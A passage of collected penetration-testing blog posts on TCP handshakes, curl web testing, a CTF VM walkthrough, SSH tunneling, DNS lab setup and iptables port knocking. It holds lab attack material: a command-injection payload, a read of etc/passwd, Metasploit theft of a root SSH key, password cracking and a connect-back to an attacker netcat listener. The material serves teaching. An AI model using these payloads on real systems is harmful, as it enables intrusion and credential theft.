From the expanded flags field you can observe that this time 2 flags, SYN and ACK, are set and the rest remain unset (zero); the control bit is 1 for both flags. This is the 2nd step of the "3-way handshake".

From the following information we find that this time the sequence number and acknowledgment number are both 1, and the client completes the connection by sending a packet with the ACK flag set. Now the TCP connection has been established between client and server.

Source Port: 58302

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Options: 12 bytes

From the image below you can observe that the control bit is 1 for the acknowledgment flag, and this is the third step required for the "3-way handshake" between the source port and destination port.

Once the TCP 3-way handshake has established the connection, data can be transferred between client and server; as you can see from the last image, it also shows the 7th layer, Hypertext Transfer Protocol, for the data transfer.

Source Port: 58302

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: PUSH, ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Options: 12 bytes

The purpose of the push function and the PSH flag is to move data forward from the sending user to the receiving user. In order to permit applications to read from and write to this socket at any time, buffers are implemented on both sides of a TCP connection.

Here you can observe that the control bit is set to 1 for the PSH and ACK flags; as a result a new layer appears for the data transferred between the sender application and the receiver application.

When we expand the data packet we find HTTP header details such as:

Host: google.com

User-Agent: Mozilla/5.0

Finally, the different types of cookie can be observed in the image below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here

Categories: Cyber India

Web Application Penetration Testing with curl

Thu, 10/Aug/2017 - 21:49

curl is a computer software project providing a library and command-line tool for transferring data using various protocols.

curl is simply awesome for the following reasons:

  • curl is an easy-to-use command line tool to send and receive files, and it supports almost all major protocols in use (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP).
  • Can be used inside your shell scripts with ease.
  • Supports features like pausing and resuming downloads.
  • It has around 120 command line options for various tasks.
  • It runs on all major operating systems (more than 40).
  • Supports cookies, forms and SSL.
  • Both the curl command line tool and the libcurl library are open source, so they can be used in any of your programs.
  • It supports configuration files.
  • Multiple uploads with a single command.
  • Progress bar, rate limiting, and download time details.
  • IPv6 support.

curl comes installed by default in most distributions. If you do not have curl installed, it is a single apt-get (apt-get install curl) or yum (yum install curl) command away.

For this tutorial we used "Web for Pentester" to demonstrate curl commands. As you know, this lab is vulnerable to many web-based attacks, so we chose curl as our tool.

Let’s begin!!

Command Injection

You must be aware of the command injection vulnerability, which allows execution of arbitrary OS commands; type the following command to list the directory on the targeted system:

curl "http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls"

From the image below you can observe that it executes the ping command as well as the ls command; as a result we found three PHP files in this directory.

Download File from URL

curl is also used to download data from any website or host; the following command downloads the putty.exe file from the website:

curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

HTTP Headers

curl can be used to identify which HTTP methods a server allows, which helps when testing for HTTP verb tampering; type the following command:

curl -v -X OPTIONS http://www.google.com

From the image below you can perceive that only the GET and HEAD methods are allowed on Google.

File Inclusion

This vulnerability allows an attacker to include a file from the web server; use the following curl command to exploit it:

curl http://192.168.0.16/fileincl/example.php?page=etc/passwd

Hence you can observe that we retrieved the contents of etc/passwd.

HTTP Authentication

HTTP authentication is used to send the server the user's username and password so that it can verify that you are allowed to send the request you are sending; curl supports HTTP Basic authentication. Now type the following command, which posts the username and password required to log in to the website through curl:

curl --data "uname=test&pass=test" http://testphp.vulnweb.com/userinfo.php

If you look at the image below carefully you can observe that the returned page contains the user's information in a table, such as e-mail ID, phone number, address and so on.

File Upload

An upload option on a website allows uploading an image or text file to that website, for example uploading an image to Facebook. Use the following curl command to upload the putty.exe file to the targeted system:

curl -F 'image=@/root/Desktop/putty.exe' http://192.168.0.16/upload/example1.php

Great! The highlighted text points to the directory "/upload/images/putty.exe", where the file has been successfully uploaded.

Open the above directory in the browser as 192.168.0.16/upload/images/

Awesome! From the image below you can see that putty.exe has been uploaded.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here

Categories: Cyber India

Hack the d0not5top VM (CTF Challenge)

Thu, 10/Aug/2017 - 13:51

This time we are going to solve a fun vulnerable lab, d0not5top 1.2. To do so we are going to download the VM from here.

The credit for developing this VM goes to 3mrgnc3, who has hidden 7 flags inside this lab as a challenge for hackers.

Let's Breach!!!

As always, let us start by finding the IP of the VM (here I have it at 192.168.1.113, but you will have to find your own).

netdiscover

Next we run nmap:

nmap -sV 192.168.1.113

Now, visit the IP in the browser.

Since I didn't find anything interesting when exploring the IP in the browser, I am now going to scan the web content using dirb in Kali Linux:

dirb http://192.168.1.113

As you can observe from the above image, I highlighted a URL which points to the control panel of the website; let's open 192.168.1.113/control in the browser. Yes, it is a DNS control panel, but I didn't find any clue for the 1st flag on this web page.

After that, move to its view-source page and notice FL46_1, which indicates it is the 1st flag.

Wonderful!! Successfully found the 1st flag.

From the dirb scan result we found many web directories on this machine, so next I chose the 192.168.1.113/control/js directory. In it I found a file, README.MadBro. It opens as shown below.

Here we found a binary code that needs to be decoded. On decoding it you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully got the 2nd flag.

Now, for the third flag, we will use netcat in very verbose mode on port 25, which hosts the smtpd service (this can be found by doing an aggressive nmap scan of the IP):

nc -vv 192.168.1.113 25

Here we found a hexadecimal code that needs to be converted to text.

Great!! Successfully got the 3rd flag as well.

On the URL where we found the second flag there is an instruction written in leet. It reads: M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T'5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in the given image.

Now open donot5topme.ctf in the browser as shown and click on Register at the end of the web page.

As you can observe, we didn't find any clue on this web page, so open the view-source page.

In View Page Source we found this link, as shown in the highlighted text.

An encoded web page opened, so I searched on Google for this encoding. It is known as Brainfuck encoding.

So we decode it. Here we got FL46_4.

Successfully found the 4th flag.

Now move back to d0not5topme.ctf. We click on Register and then on "I agree to these terms" and get to the registration page. Here we click on Board Administration, which opens a prompt asking which client should open the mailto link; here I chose Gmail.

Here I found another ctf domain: "Megusta@G4M35.ctf"

Now let's add G4M35.ctf to /etc/hosts as we did before and click on Save.

When I opened this domain in the browser, I got a game to play. Although you can get the next clue by playing too, I thought of a more technical approach and opened this web page with Inspect Element. Select the Debugger tab; here I found game.js, and inside the Game_Over script I found the next clue, "/H3X6L4m3".

Now opening the complete link "g4m35.ctf/H3X6L4m3" on this domain gave me another game.

Again we could play and discover the next clue/flag, but we took a more technical approach and ran a dirb command to look through its directories:

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From given result I had highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.

Now I have opened this textures directory in the browser, here I open the skybox directory and then the dawnclouds directory and found the nz.jpg file as shown.

Now open this image and got the octal code.

When decode this code I found FL46_5

I had Captured 5th flag also!!

Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open with Inspect Element. Now select the Debugger Tab. Here I found Gameplay.js and got another domain “t3rmln4l.ctf” as shown below.

Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save.

Now as before, while opening this domain in browser, I got a Terminal which asks for password. After trying a bunch of commands, I found grep* runs on this terminal and for authentication I entered the name of domain as password i.e t3rm1a4l.ctf and found another domain “M36u574.ctf”.

Now let’s add M36u574.ctf also into /etc/hosts as we did before and click on Save.

Now as before, you will open this domain in browser, you will get a slideshow of Megusta images. Out of different images I have downloaded the kingmegusta.jpg.

 Now we will run exiftool on this image, here I got some code in Comment as shown below.

Now convert the code to Text and found following code as shown in image. Copy this code it is base64 encoded.

Then I had created a text file on /root/Desktop/ name anything you want and Paste the above decoded text in this file.

Now run John The Ripper, using this file as shown

john –wordlist=/usr/share/wordlists/rockyou.txt donotstop

Here I found a user MeGustaKing and Password ********** (10 times *).

Now using this username and password combination we will login into the ssh. Here we get a code and another username and password combination i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.

Copy and paste above code inside it. It is in base64 encryption, after decrypting the code we found that it is md5 encoded.

Great! It is the 6th Flag.

As mentioned above, in the previous SSH login we got the username burtieo, and its password is the text written above it, i.e. Lets you update your FunNotes and more!

Now let’s log in over SSH using the combination

Username : burtieo and Password : Lets you update your FunNotes and more!

This opens an rbash shell; rbash restricts some of the features of the bash shell.

So, first run the following command

suedoh -l

And then we run the command

suedoh /usr/bin/wmstrt

Using the nmap command I found port 10000 open.

But this port only remains open for 20 seconds; we can make it stay open longer using a “for loop” as shown.

Now let’s run Metasploit and use the module named file_disclosure

msf > use auxiliary/admin/webmin/file_disclosure

msf auxiliary(file_disclosure) > set rhost 192.168.1.113

msf auxiliary(file_disclosure) > set ssl true

msf auxiliary(file_disclosure) > set rpath /root/.ssh/id_rsa

msf auxiliary(file_disclosure) > exploit

I found the RSA private key as shown.

Now copy and paste this private key into a file named id_rsa and then run John the Ripper.

ssh2john id_rsa > ignite

john --wordlist=/usr/share/wordlists/rockyou.txt ignite

This gave the root password, i.e. “gustateamo”.

Now I changed the permissions of id_rsa with chmod 700 and logged in over SSH as root with password gustateamo as shown below.

Now type the following command

ls

You can observe from the given image that it contains two files; let’s open one of them

cat L45T_fl46.pl

Here it gave the message about using L45T_fl46.pl

Now use the netcat command to listen for a connection from the target on port 1234.

nc -lvvp 1234

Now in the D0Not5top terminal we will run L45T_fl46.pl with IP 192.168.0.7 (the Kali Linux IP) as given below:

./L45T_fl46.pl 192.168.0.7 1234

On the attacker system you will get a netcat connection from the target system. The highlighted text indicates FL46_7.

Congratulations!! It is the 7th flag.

Solving this lab was a fun and learning experience.

Author: Rajat Chikara is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India.

The post Hack the d0not5top VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

How to Perform Remote Tunneling

Thu, 03/Aug/2017 - 21:56

Hello friends! Previously we discussed dynamic tunneling and local tunneling, and today we are going to discuss remote tunneling.

Remote tunneling is useful when a client machine wants to access a remote system that lies outside its network.

Example: your personal laptop (at home) is connected to your office server; currently you are working on a client system (at the office) which is connected to the office server. Now if you want to connect your client system to the laptop in order to read some document, there has to be a remote tunnel between them for communication.

Let’s Begin!!

Objective: to establish an HTTP connection between a remote PC and a client system on a different network.

Here I have set up my own lab, which consists of three systems in the following network:

  1. SSH server (two Ethernet interfaces)
  2. IP 192.168.0.116 connected to the remote system 192.168.0.100
  3. IP 192.168.10.1 connected to the local network system 192.168.10.2
  4. Ubuntu client (local network system) holds IP 192.168.10.2
  5. Remote system (outside network) holds IP 192.168.0.100

The image given below describes the network configuration of the SSH server, showing its two IPs, 192.168.0.116 and 192.168.10.1, as explained above.

Another image given below describes the network configuration of the Ubuntu client, showing IP 192.168.10.2.

Another image given below describes the network configuration of the remote desktop, whose IP is 192.168.0.100.

In this tutorial we are showing HTTP tunneling; the HTTP service is running on port 80 of a XAMPP server (at localhost of the remote desktop).

From the given image you can observe that the WordPress website is running on port 80.

From the SSH server we successfully browsed the WordPress website using the URL http://192.168.0.100/index.html and got connected to the remote desktop; since they belong to the same network, they can reach each other for communication.

Similarly we tried to connect to the remote desktop from the Ubuntu client through the URL http://192.168.0.100/index.html but failed to browse the WordPress website. Since they belong to different networks, the connection fails here.

Now try to establish a link between the remote desktop and the Ubuntu client using PuTTY.

Use PuTTY to connect to the SSH server (192.168.0.116) via port 22 and follow the steps given below.

Then go to the option SSH > Tunnels in the left-hand Category column and follow the steps given below:

  1. Tick the check box “Local ports accept connections from other hosts”
  2. Give the new forwarded port as 7000 and the connection type as Remote.
  3. Give the destination address as 127.0.0.1:80 for establishing the connection, then click on Add.
  4. Click on Open when everything is set.

This first establishes the connection between the remote PC and the SSH server, which then acts as a link between the remote desktop and the Ubuntu client throughout the communication.

Now open the browser inside the Ubuntu client and again try to connect to the remote desktop using the URL http://192.168.0.116:7000/index.html. This browses the WordPress website running on localhost of the remote desktop, via the SSH server on port 7000.

Hence we have successfully connected to the remote desktop from the Ubuntu client.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post How to Perform Remote Tunneling appeared first on Hacking Articles.

Categories: Cyber India

Setup DNS Penetration Testing Lab on Windows Server 2012

Wed, 02/Aug/2017 - 22:33

From Wikipedia

The Domain Name System is used to translate names into IP addresses, or you can say that it is used for name resolution.

A name exists only for the benefit of humans. It is translated into an IP address to reach the destination. The process of translating a name is called name resolution.

Name resolution proceeds from right to left. There is another “.” after com, but it is hidden; this is called the root level domain. The request is first sent to the root domain for translation; it forwards the request to the com domain, which is called the Top Level Domain. Com passes the request to the yahoo domain, which is called the 2nd-level domain. Yahoo then sends the request to www, which is called the host name.

The structure of DNS is distributed over the internet. This means that the name resolution task is not assigned to only one computer; rather, it is distributed over the internet.

Steps to Install DNS server

Configure the static IP settings of your server; here we assigned IP 192.168.1.104 to our machine, and we also set the server’s own IP as the preferred DNS server.

Open Server Manager and then click on Add Roles and Features in order to install role services and features. A new window will appear on screen; now click on Next as shown in the image below.

Select the installation type “Role-based or feature-based installation”, which is also the default option, and then click on Next for the next step.

Select the desired server from the server pool for the configuration of the DNS server. From the image below you can observe that one computer with IP 192.168.1.104 was found in the pool and has been selected as the server; now click on Next.

Select the DNS Server checkbox as the role to install on the selected server and click on Next.

Now just click on Next after reading the brief description of DNS.

To install the selected role and features on the selected server, click on Install.

The DNS server installation process begins and may take a few minutes; finally, click on Close once the installation has completed.

This is all about DNS installation; in the next step we will configure the DNS server.

Zone

The database of DNS is called a zone; in other words, a partition of the Domain Name Space represented by a domain name is called a zone. When you expand the zones you will see two kinds, Forward Lookup Zones and Reverse Lookup Zones.

A Forward Lookup Zone takes a name and returns the IP address of the computer.

A Reverse Lookup Zone takes the IP address of the computer and returns its name. Why would we need the name of the computer? If a firewall is installed on the computer, the firewall may stop or allow traffic on the basis of the name; that is why a reverse lookup zone is used to convert an IP address into a name.

Steps to create a Forward Lookup Zone:

  • Select DNS from the drop-down list in Server Manager; this shows the server on which we installed the DNS role. Select your server (WIN-KSR8OM147HH), right-click on it and select DNS from that list.

When we select DNS in Server Manager it opens a new window, DNS Manager.

Now we will configure the Forward Lookup Zone as well as the Reverse Lookup Zone. To create a Forward Lookup Zone, select Forward Lookup Zones, right-click on it and select New Zone from the menu to bring up the New Zone Wizard, then click on Next.

It shows the list of the different zone types and storage options, such as Primary Zone, Secondary Zone and Stub Zone.

Zone Types

Primary Zone: a primary DNS zone has read/write authority for the DNS server, which is also known as the master server. It stores the master copy of the zone data in a local file or in AD DS.

Secondary Zone: a secondary DNS zone is a read-only copy of a primary zone; this DNS server is a secondary source of information about the zone.

Active Directory Integrated DNS Zone: this is also a writable zone. To make an Active Directory integrated zone the machine must be a domain controller. The RODC (read-only domain controller) feature is only available in Server 2008 R2. The domain controller must be writable, not read-only, because it is more secure. There is a security tab in the AD integrated zone; it is multi-master structured. In the case of an AD integrated zone, the DNS database is replicated as part of domain replication.

Stub zone: it is secondary by nature. It has no database of its own; it loads the database from the master DNS. It only takes selected records, not the complete database: three record types, NS, SOA and glue A, are transferred into the stub zone. A stub zone is read-only.

DNS uses port 53 for communication, over both TCP and UDP. Dynamic DNS (DDNS) is used to automatically update IP addresses in DNS when they are changed by DHCP. You can enable the DDNS option in the zone properties as secure only.

Select Primary zone and click on Next.

Give the desired zone name, such as raj, and click on Next.

Save this into a new zone file, raj.dns, and click on Next.

Select the “Do not allow dynamic updates” option if you want to update these records manually. Click on Next, then Finish.

Now we have completed the configuration of the Forward Lookup Zone; next we will configure the Reverse Lookup Zone.

Reverse Lookup Zone:

Domain Name System (DNS) servers can enable clients to determine the DNS name of a host based on the host’s IP address by providing a special zone called a reverse lookup zone. A reverse lookup zone contains pointer (PTR) resource records that map IP addresses to host names. Some applications, such as secure web applications, rely on reverse lookups.

A reverse lookup takes the form of a question, such as “can you tell me the DNS name of the computer that uses the IP address 192.168.1.120?”

A special domain, the in-addr.arpa domain, was defined in the DNS standards and reserved in the internet DNS namespace to provide a practical and reliable way to perform reverse queries. In a reverse lookup zone the address is written in reverse order.

Steps to create a Reverse Lookup Zone:

To create a Reverse Lookup Zone, right-click on Reverse Lookup Zones and click on New Zone in the menu to bring up the New Zone Wizard.

Select Primary zone and click on Next.

Click on the first radio button, IPv4 Reverse Lookup Zone, to translate IP addresses into DNS names, then click on Next.

Type 192.168.1 in the Network ID field, which is the first three octets of the IP address of our DNS server, then click on Next.

Save this in a new zone file (select the first radio button for this step), then click on Next.

Select the “Do not allow dynamic updates” option if you want to update these records manually. Click on Next.

We have successfully completed the configuration of the new Reverse Lookup Zone. Now just click on Finish.

Now you can observe on the right side of the DNS Manager window that the Reverse Lookup Zone has been created and contains two records, SOA and NS.

  • Now we are going to create a new pointer in our new zone file, i.e. 168.192.in-addr.arpa, as shown in the image below

Here we require a host name in order to create the new resource record; click on Browse to select the record.

Resource Records

Resource records are the DNS database entries used to answer DNS client queries. Each has a name, a type and data. The client’s query is always shown under the name column and the DNS server’s answer under the data column; the type column shows which kind of record it is. Common records in DNS are A (name to IP), PTR (reverse of A), SRV, MX, NS, SOA, etc.

Select the second entry, i.e. the name server (NS) record, as shown in the image below and click on OK.

DNS Queries

There are two types of queries in DNS:

  • Recursive Query: goes from a DNS client to a DNS server. Its answer is complete, meaning the processing is complete.
  • Iterative Query: goes from one DNS server to another DNS server. Its answer is not complete, meaning its reply is a referral. Iterative queries are used to reach from one DNS server to another. The server keeps the reply in its cache for 60 minutes.

Verify DNS configuration

Open a command prompt and type the following command, which queries the Domain Name System (DNS) to find the mapping between domain name and IP address.

nslookup 192.168.1.104 (server’s IP)

From the image below you can read the name of the NS record/domain name, i.e. raj.

Similarly, using the command nslookup raj we found the host IP, i.e. 192.168.1.104.
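As an added example (not part of the original lab), the following Python builds the A and PTR records that the two wizards above produce and checks that they agree, which is the consistency that applications relying on reverse lookups depend on. The zone name raj, the network ID 192.168.1 and the server address 192.168.1.104 come from the lab; the second host is constructed.

```python
import ipaddress

# Added example (not part of the original lab write-up): forward and reverse
# records for the lab zone, plus the check that every A record has a PTR
# pointing back at the same name. Only raj / 192.168.1 / 192.168.1.104 come
# from the lab; the "web" host is constructed sample data.

LAB_ZONE = "raj"
LAB_NETWORK_ID = "192.168.1"
LAB_HOSTS = {
    "win-ksr8om147hh": "192.168.1.104",   # the DNS server itself
    "web": "192.168.1.120",               # constructed second host
}


def reverse_zone_name(network_id: str) -> str:
    """'192.168.1' -> '1.168.192.in-addr.arpa' (octets reversed, as the wizard does)."""
    return ".".join(reversed(network_id.split("."))) + ".in-addr.arpa"


def ptr_owner(ip: str) -> str:
    """Owner name of the PTR record for ip, e.g. '104.1.168.192.in-addr.arpa'."""
    return ipaddress.ip_address(ip).reverse_pointer


def forward_records(zone: str, hosts: dict):
    """A records as (owner, type, data) tuples; owners are FQDNs with a trailing dot."""
    return [(f"{name}.{zone}.", "A", ip) for name, ip in hosts.items()]


def reverse_records(zone: str, hosts: dict):
    """PTR records that the reverse-zone 'New Pointer' dialog creates for the same hosts."""
    return [(f"{ptr_owner(ip)}.", "PTR", f"{name}.{zone}.") for name, ip in hosts.items()]


def missing_ptrs(a_records, ptr_records):
    """A records whose IP has no PTR mapping back to the same name (forward/reverse drift)."""
    ptr_map = {owner: data for owner, rtype, data in ptr_records if rtype == "PTR"}
    return [
        (owner, ip)
        for owner, rtype, ip in a_records
        if rtype == "A" and ptr_map.get(f"{ptr_owner(ip)}.") != owner
    ]


def reverse_lookup(ip: str, ptr_records):
    """What 'nslookup <ip>' would answer from these records, or None if no PTR exists."""
    target = f"{ptr_owner(ip)}."
    for owner, rtype, data in ptr_records:
        if rtype == "PTR" and owner == target:
            return data
    return None


if __name__ == "__main__":
    a = forward_records(LAB_ZONE, LAB_HOSTS)
    p = reverse_records(LAB_ZONE, LAB_HOSTS)
    print("reverse zone:", reverse_zone_name(LAB_NETWORK_ID))
    print("nslookup 192.168.1.104 ->", reverse_lookup("192.168.1.104", p))
    print("A records without a PTR:", missing_ptrs(a, p))
```

Running missing_ptrs against a zone export is a quick way to catch the usual drift between forward and reverse zones when dynamic updates are disabled and records are maintained by hand, as in this lab.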

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post Setup DNS Penetration Testing Lab on Windows Server 2012 appeared first on Hacking Articles.

Categories: Cyber India

How to Secure Port using Port Knocking

Wed, 02/Aug/2017 - 11:04

From Wikipedia

Port knocking is a technique used for sending information through closed ports on a computer in a network behind a firewall. It adds security to your network: a connection to a particular port is not allowed until the correct sequence of ports has been knocked. The network administrator configures port knocking using iptables, which acts as the firewall.

An iptables chain allows a client who knows the secret knock to enter the network through a specific port by performing a sequence of connection attempts.

The main purpose of port knocking is to stop an attacker from finding potentially vulnerable services with a port scan: if the attacker does not send the correct knock sequence, the protected ports appear closed.

Port knocking with iptables

iptables is the command-line firewall utility of the Linux kernel that uses rule chains to permit or block traffic. It defines various tables that contain a number of built-in chains, which may contain user-defined chains as well. An iptables chain is a list of rules used to match a set of packets. Every rule specifies what should be done with the packets that match it.

The commands given below build the knocking rules; the options they use are:

-F, --flush [chain]

Flush the selected chain (all the chains in the table if none is given). This is equivalent to deleting all the rules one by one.

-X, --delete-chain [chain]

Delete the optional user-defined chain specified. There must be no references to the chain. If there are, you must delete or replace the referring rules before the chain can be deleted. The chain must be empty, i.e. not contain any rules. If no argument is given, it will attempt to delete every non-builtin chain in the table.

-Z, --zero [chain [rulenum]]

Zero the packet and byte counters in all chains, or only the given chain, or only the given rule in a chain. It is legal to specify the -L, --list (list) option as well, to see the counters immediately before they are cleared.

-N, --new-chain chain

Create a new user-defined chain by the given name. There must be no target of that name already.

-A, --append chain rule-specification

Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule will be added for each possible address combination.

-p, --protocol protocol

The protocol of the rule or of the packet to check. The specified protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the special keyword “all”, or it can be a numeric value representing one of these protocols or a different one. A protocol name from /etc/protocols is also allowed. A “!” argument before the protocol inverts the test. The number zero is equivalent to all. “all” will match all protocols and is taken as the default when this option is omitted.

-m, --match match

Specifies a match to use, that is, an extension module that tests for a specific property. The set of matches makes up the condition under which a target is invoked. Matches are evaluated first to last as specified on the command line and work in short-circuit fashion, i.e. if one extension yields false, evaluation will stop.

-j, --jump target

This specifies the target of the rule, i.e. what to do if the packet matches it. The target can be a user-defined chain (other than the one this rule is in), one of the special built-in targets which decide the fate of the packet immediately, or an extension. For example ACCEPT, DROP and REJECT.

From ipset.netfilter.org

iptables -F

iptables -X

iptables -Z

iptables -N STATE0

iptables -A STATE0 -p tcp --dport 1200 -m recent --name KNOCK1 --set -j DROP

iptables -A STATE0 -j DROP

iptables -N STATE1

iptables -A STATE1 -m recent --name KNOCK1 --remove

iptables -A STATE1 -p tcp --dport 1300 -m recent --name KNOCK2 --set -j DROP

iptables -A STATE1 -j STATE0

iptables -N STATE2

iptables -A STATE2 -m recent --name KNOCK2 --remove

iptables -A STATE2 -p tcp --dport 1400 -m recent --name KNOCK3 --set -j DROP

iptables -A STATE2 -j STATE0

iptables -N STATE3

iptables -A STATE3 -m recent --name KNOCK3 --remove

iptables -A STATE3 -p tcp --dport 22 -j ACCEPT

iptables -A STATE3 -j STATE0

iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

iptables -A INPUT -s 127.0.0.1/8 -j ACCEPT

iptables -A INPUT -p icmp -j ACCEPT

iptables -A INPUT -p tcp --dport 80 -j ACCEPT

iptables -A INPUT -m recent --name KNOCK3 --rcheck -j STATE3

iptables -A INPUT -m recent --name KNOCK2 --rcheck -j STATE2

iptables -A INPUT -m recent --name KNOCK1 --rcheck -j STATE1

iptables -A INPUT -j STATE0

Let’s verify it through port scanning using the nmap command.

nmap -sT 192.168.0.25

From the image below you can observe that nmap found only port 80 open.

Type the apt-get install knockd command to install knockd.

knockd is a port-knock command-line utility. It listens to all traffic on an Ethernet interface, looking for particular “knock” sequences of port hits. A client makes these port hits by sending a TCP or UDP packet to a port on the server.

Now type the following command to perform the port knocking

knock -v 192.168.0.25 1200 1300 1400

From the given image you can observe that it starts hitting the given ports one after another, which is what port knocking actually is. Since the client knows the sequence, it can make the correct knock sequence of connection attempts.

Again use port scanning with nmap on the same target

nmap -sT 192.168.0.25

Hence you can see the difference between the two nmap results: this time we got port 22 open for the SSH service.

Now the client can use its credentials to log in to the SSH server.

Conclusion! The network admin adds a filter on a specific port that waits for the correct knock sequence, which then opens the port to establish the connection; otherwise the port remains closed until the correct ports are knocked.
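To see how the chains above behave as a whole, here is a Python model of that state machine. It is an added example, not code from the post or from the netfilter site, and it models only the verdict for a new TCP connection (the ESTABLISHED,RELATED rule is assumed to carry the rest of an accepted connection). The ports are the ones in the rules; the client addresses in the demo are constructed.

```python
# Added example (not from the original post): a Python model of the iptables
# "recent"-module state machine above. It decides the fate of a new TCP SYN the
# way the chains do: knocks are DROPped so the ports look closed, and only the
# complete sequence lets the next SYN to the protected port through. Ports are
# the post's values; the client addresses used below are constructed.

KNOCK_SEQUENCE = (1200, 1300, 1400)   # KNOCK1, KNOCK2, KN0CK3 in order
PROTECTED_PORT = 22
ALWAYS_OPEN = frozenset({80})          # "--dport 80 -j ACCEPT"


class KnockFirewall:
    def __init__(self, sequence=KNOCK_SEQUENCE, protected=PROTECTED_PORT,
                 always_open=ALWAYS_OPEN):
        self.sequence = sequence
        self.protected = protected
        self.always_open = always_open
        # source IP -> number of correct knocks seen so far; this stands in for
        # the KNOCKn lists. Like the post's rules (no --seconds), entries never
        # expire, so a half-finished knock stays pending indefinitely.
        self.stage = {}

    def packet(self, src: str, dport: int) -> str:
        """Verdict for a new connection from src to dport: 'ACCEPT' or 'DROP'."""
        if dport in self.always_open:
            return "ACCEPT"
        # INPUT jumps to STATEn via --rcheck; every STATEn starts with --remove.
        stage = self.stage.pop(src, 0)
        if stage == len(self.sequence):
            # STATE3: the full sequence was knocked; admit one SYN to the port.
            if dport == self.protected:
                return "ACCEPT"
        elif dport == self.sequence[stage]:
            # STATEn: correct next knock -> --set KNOCK(n+1), but still DROP.
            self.stage[src] = stage + 1
            return "DROP"
        # Anything else falls into STATE0: only the first knock port starts over.
        if dport == self.sequence[0]:
            self.stage[src] = 1
        return "DROP"


def knock(fw: KnockFirewall, src: str, ports) -> None:
    """What 'knock -v <host> 1200 1300 1400' does: one SYN per port, in order."""
    for port in ports:
        fw.packet(src, port)


def scan(fw: KnockFirewall, src: str, ports):
    """What an nmap connect scan sees: the ports whose SYN is ACCEPTed."""
    return [p for p in ports if fw.packet(src, p) == "ACCEPT"]


if __name__ == "__main__":
    fw = KnockFirewall()
    print("before knocking:", scan(fw, "192.0.2.10", range(1, 2000)))   # [80]
    knock(fw, "192.0.2.10", KNOCK_SEQUENCE)
    print("ssh after knocking:", fw.packet("192.0.2.10", 22))            # ACCEPT
```

Two properties of the ruleset become visible in the model: a sequential scan passes 1200, 1300 and 1400 with other ports in between, so it never reaches STATE3 and sees only port 80; and the ACCEPT in STATE3 removes the marker, so each successful knock admits exactly one new connection before the sequence has to be repeated.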

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post How to Secure Port using Port Knocking appeared first on Hacking Articles.

Categories: Cyber India

How to Perform Local SSH Tunneling

Sat, 29/Jul/2017 - 21:19

Hello Friends! Previously we discussed SSH tunnels and the steps to perform dynamic tunneling (port forwarding), which you can read from here. Today we will talk about the same scenario and perform local tunneling (port forwarding).

Local tunneling is a process to access a specific SSH client machine for communication. It lets you establish a connection to a specific machine that is not reachable from the internet.

The only difference between dynamic tunneling and local tunneling is that dynamic tunneling requires a SOCKS proxy for tunneling all TCP traffic, while local tunneling only requires the destination IP address.

Let’s Begin!!

Objective: to establish an SSH connection between a remote PC and a local system on a different network.

Here I have set up my own lab, which consists of three systems in the following network:

  1. SSH server (two Ethernet interfaces)
  2. IP 192.168.1.217 connected to the remote system 192.168.1.219
  3. IP 192.168.10.2 connected to the local network system 192.168.10.2
  4. SSH client (local network) holds IP 192.168.10.2
  5. Remote system (outside network) holds IP 192.168.1.219

The image given below describes the network configuration of the SSH server, showing its two IPs, 192.168.1.217 and 192.168.10.1, as explained above.

Another image given below describes the network configuration of the SSH client, showing IP 192.168.10.2.

The remote PC (192.168.1.219) tries to connect to the SSH server (192.168.1.217) via port 22 and logs in to the server successfully.

Similarly, the remote PC (192.168.1.219) now tries to connect to the client PC (192.168.10.2) via port 22; since they belong to different networks, it receives a network error.

Steps for SSH local tunneling

  • Use PuTTY to connect to the SSH server (192.168.1.22) via port 22 and choose the option SSH > Tunnels in the left-hand Category column.
  • Give the new forwarded port as 7000 and the connection type as Local.
  • Give the destination address as 198.168.10.2:22 for establishing the connection with the specific client, then click on Add.
  • Click on Open when everything is set.

This establishes the connection between the remote PC and the SSH server.

Open a new PuTTY window and follow the steps given below:

  • Give the host name as localhost, port 7000 and connection type SSH.
  • Click on Open to establish the connection.

Awesome!! We have successfully accessed the SSH client via port 7000.
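Both the remote forward in the earlier post and this local forward come down to the same relay: a listening socket at one end of the SSH connection whose clients get connected to a destination at the other end. The following is an added example, not code from the post, of that relay written with plain sockets on loopback, so it runs without PuTTY or an SSH server. The echo server is a constructed stand-in for the client machine at 192.168.10.2:22, and the forwarder takes the place of PuTTY's localhost:7000 listener.

```python
import socket
import threading

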